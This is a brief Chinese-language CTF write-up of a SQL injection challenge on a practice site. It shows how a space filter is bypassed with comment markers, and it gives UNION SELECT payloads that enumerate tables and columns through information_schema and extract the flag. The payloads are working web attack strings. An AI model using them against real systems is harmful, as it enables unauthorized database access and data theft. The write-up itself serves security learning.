地址:http://ctf5.shiyanbar.com/web/index_2.php
参考资料:http://www.bubuko.com/infodetail-2301250.html
1.直接输入单引号,根据报错信息确定参数值类型为字符型
2.输入‘ or ‘1‘=‘1,直接报错,信息为SQLi detected!,首先猜测or被过滤,直接去掉or,继续输入‘ ‘1‘=‘1,
仍然报错,信息为SQLi detected!,猜测空格被过滤,直接输入’or‘1’=‘1,如下图所示,确定空格被过滤。
3.尝试使用多行注释符(块注释符)
输入‘//or//‘1‘=‘2,无任何返回,确定块注释符可以使用。
4.爆当前数据库中的表
‘//union//select//concat(table_name)//from//information_schema.tables//where//table_schema=database()//having’1’='1
5.爆flag表中字段和值
'//union//select//concat(column_name)//from//information_schema.columns//where//table_name=‘flag’//having//‘1’='1
6.
'//union//select//flag//from//flag//having//‘1’='1